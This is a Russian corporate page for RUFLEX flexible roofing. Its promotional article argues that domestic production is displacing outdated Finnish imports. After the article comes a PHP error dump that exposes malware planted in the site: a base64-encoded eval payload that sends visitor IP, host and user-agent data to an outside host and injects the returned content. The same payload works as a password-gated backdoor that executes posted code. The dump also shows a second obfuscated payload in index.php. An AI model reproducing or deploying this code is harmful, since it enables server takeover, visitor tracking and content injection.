Гибкая
черепица
+7 (495) 234-41-41
8 (800) 234-41-10
заказать звонок
Вконтакте Twitter Facebook Youtube
Рус / Eng

ВПЕРЕД ШАГАЯ – В РОССИИ МЫ СИЛЬНЫ


Последнее время воздух засоряют разнообразные предположения насчет будущего кровельного рынка в России. Главное правило реальности – не запутаться в иллюзиях. А их в эфир пускается немало, притом с необоснованно бодрыми надеждами со стороны уходящих в прошлое импортных производителей. Настало время расставить точки и понять, какое место на российском рынке занимает Ассоциация «Dиана», отечественная продукция и, собственно, финский импорт.

Как финская черепица вообще попала в Россию?

На российский рынок 20 лет назад гибкая черепица с финского завода попала благодаря Ассоциации «Dиана». Тогда в стране был реальный дефицит на новинки вообще, а на кровельные – тем более. Помните старый добрый шифер и рубероид?

Новая для того времени кровельная технология – гибкая черепица, благодаря своей функциональности при нашем нестабильном климате, пришлась ко двору. За первые несколько лет работы с финнами «Dиана» добилась успеха – черепица стала очень популярной в России и СНГ.

С течением времени мудро прогнозируя развитие отечественного рынка Ассоциация «Dиана» начала ввозить черепицу под своей торговой маркой RUFLEX. Задумка была простая: время и преимущества импорта с течением времени останутся в прошлом. Рано или поздно наступит время «новой эры». Эры качественной гибкой черепицы RUFLEX, производимой в России для российских покупателей.

Прогноз стал реальностью уже через несколько лет. Отсутствие новых разработок и инноваций в производственном процессе на финском заводе, их морально устаревший продукт, который приходилось реализовать по цене, завышенной за счет таможенных пошлин и доставки – всё это превратилось в балласт для «Dианы». Там где нет перемен – разум погибает. Российский покупатель прекрасно понимает, что и по какой цене ему предлагают поставщики и предъявляет новые требования к качеству кровли и её возможностям.
Тогда и было принято решение сделать шаг вперед, от поставок к производству – это даёт широчайшие возможности для изготовления того продукта под маркой RUFLEX, который требует рынок. И не только рынок в целом, но и каждый отдельно взятый хозяин своего дома. Пришла пора той самой новый эры.

Легенды и мифы древнего завода

Судьба финского завода так же очевидна, как и немного скорбна. В данный момент финны, пожалуй, уже не в силах обновлять свои производственные мощности и идти в ногу с потребностями рынка России и Европы.

Новых форм нарезки гонтов нет:  как было их 3 штуки последние 20 лет, так они и будут лежать на полках, скорее всего, оставшиеся пару-тройку лет. То же самое происходит и с добавлением цветов: за последние 4 года завод добавил только 2 новых цвета. И даже не цвета, а так, новые нюансы уже имеющихся оттенков. Как говорится, разве можно относиться серьёзно к книжке без картинок?

Если же брать использование зарубежного сырья, как транслируемое финнами преимущество, тут тоже нестыковка. Финны перешли на использование российской нефти, и делают это уже последние 10 лет. Никаких венесуэльских скважин давно нет. В общем, все поросло болотной травой, где-то на уровне тех самых 90-х.

Смешно представить, что сегодня вы купите автомобиль без коробки автомат или гидроусилителя руля. Точно такой же, какой продавался 20 лет назад. Или зайдете в магазин с мешком денег – пластиковых карт тогда тоже не было.

Про электронику, медицину, энергетику скромно промолчим. Аналогия наглядна. Где же «в ногу со временем» и репутация? Это всё осталось у «Dианы». И технологии, и перспективы, и адаптация к сегодняшнему дню.

Очевидно, что любой импортный «свечной» заводик скоро затухнет сам с собой, не выдержав конкуренции с российскими производителями ни по мощностям, ни по выпускаемому продукту.

Рынок забирает силу. Выживает сильнейший. Слабые бьются в агонии, демпингуя, забивая склады излишком товаров, и держатся на честном слове чужой былой славы. Добавим в этот компот завод, которому уже 60-70 лет. Чтобы выжить и вновь занять лидерские позиции в России, этому заводу прямо сейчас надо наладить выпуск НЛО, тогда возможно что-то получится. Либо перенести завод в Китай – а что? Тоже способ. С качеством продукции уже беда, а в Китае его вообще не будет.

«Dиана» же, отбросив ненужный балласт, вышла на новый уровень своего развития – от дистрибьюции к производству.

Теперь в распоряжении «Dианы» целый арсенал:

  • возможность выпускать RUFLEX в своей стране на собственном заводе;
  • снижение цен на гибкую черепицу;
  • сохранение заявленного уже 20 лет качества кровли под маркой RUFLEX, благодаря новейшему оборудованию;
  • выпуск форм и цветов по желанию заказчика;
  • складские мощности;
  • инженерная инфраструктура.

Все это в комплексе с энергоэффективностью и экологичностью. Совсем другой коленкор, не правда ли?

Немного экономики никогда не помешает

Теперь окунемся в формирование цены на импортные товары. Ни для кого не секрет, что россияне переплачивают за товары зарубежных брендов, которые в других странах стоят на порядок дешевле. Одной из причин такого «беспредела» является эксклюзивность, которую требуют экспортеры. То самое хваленое эксклюзивное дистрибьюторство позволяет некому финскому заводу монопольно назначать цены на свой товар. Если же снять запрет, то рынок заполонит  контрафакт, что приведет к засилью страны поддельным товаром.  

Тем не менее, независимо от «эксклюзивности», цены на зарубежные товары напрямую зависят от курса рубля. Сейчас рубль ослаб, соответственно, «подросли» доллар и евро. По прогнозам экономистов, стоимость ввозимых товаров повысится сначала на 10-15%. Дальше – больше. На продовольствии, быть может, это не сильно отразится. Но кровельные материалы относятся к более чувствительным, с точки зрения ценовых колебаний, товаров.

Но даже если не принимать во внимание все эти «печальки», хочется напомнить, из чего складывается цена на импортную гибкую черепицу. Нам это хорошо известно:

ЦЕНА = высокая цена закупки в валюте + таможенная пошлина (15% для гибкой черепицы) + таможенный сбор + накладные расходы + транспортные расходы + страховые платежи. 

Вы представляете, сколько вы переплачиваете?

Просто мы живем… по разные стороны

Наша страна давно стала благодатной почвой для бизнеса. Нет смысла вывозить деньги из страны, если рентабельность производства в России выше. До этой умной мысли дошли практически все существующие марки гибкой черепицы, открыв здесь свои заводы.

И ведь отрадно каждому из нас осознавать, что рынок кровли в России начал формироваться именно из продукции отечественного производства. С увеличением производственных площадок предложений по гибкой черепице, безусловно, станет больше. На первое место выступит качество продукта, разнообразие линеек – от эконом-класса до премиум, множество форм и возможностей дизайна.

Таким образом, недалекими видятся пассажи мнимых аналитиков на предмет будущего кровельного рынка России. Якобы благодаря сваре российских производителей из-за будущих нереальных объемов выпускаемой гибкой черепицы, финский завод станет больше продавать.

Безусловно, производители в России будут доводить до сведения неопределившихся покупателей все преимущества именно российских товаров. Да и покупатели знают свои требования к качеству и цене.  Уж всяко отличат и сопоставят цены на хорошее и застаревшее.

Проблемой может стать только недостаток информации.
Но господа! Чем меньше вы знаете, тем легче вами управлять. Оно вам надо?

Мы в:
MODx Content Manager 32 »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert() [function.assert]: Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /home/u199389/ruflex.ru/www/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0.0037 s(1 Requests)
  PHP: 0.4339 s 
  Total: 0.4376 s